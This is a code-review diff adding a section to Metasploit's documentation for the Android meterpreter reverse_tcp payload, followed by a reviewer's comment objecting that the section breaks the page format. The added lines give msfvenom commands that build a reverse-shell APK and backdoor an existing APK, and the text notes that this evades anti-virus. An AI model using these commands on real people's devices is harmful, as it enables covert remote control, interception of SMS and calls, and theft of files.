documentation/modules/payload/android/meterpreter/reverse_tcp.md

```diff
@@ -4,6 +4,29 @@ do with it already.
 
 The Android Meterpreter allows you to do things like take remote control the file system, listen to phone calls, retrieve or send SMS messages, geo-locate the user, run post-exploitation modules, etc.
 
+
+### To create the APK with msfvenom:
+
+```
+./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
+```
+
+### To inject meterpreter into an existing APK with msfvenom:
+
+You can also add Android meterpreter to any existing APK. This will make it harder for
+Anti-virus software to detect the payload, and allow you read internal files and take
+screenshots of the Android app that you are backdooring:
+
+```
+./msfvenom -p android/meterpreter/reverse_tcp -x com.existing.apk LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
+```
+
+[Please see here for more documentation on Android injection](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/injection.md).
+
+
+Next, start an Android device. Upload the APK, and execute it. There are different ways to do this.
+
+
```

Comment:
Again this entire section breaks the format of 

```
## Vulnerable Application
## Verification Steps
## Options
## Scenarios
```

This is also a case of you rearranging items out of this order when they already exist in their proper subsection within the document, so I don't see the use of these sort of changes.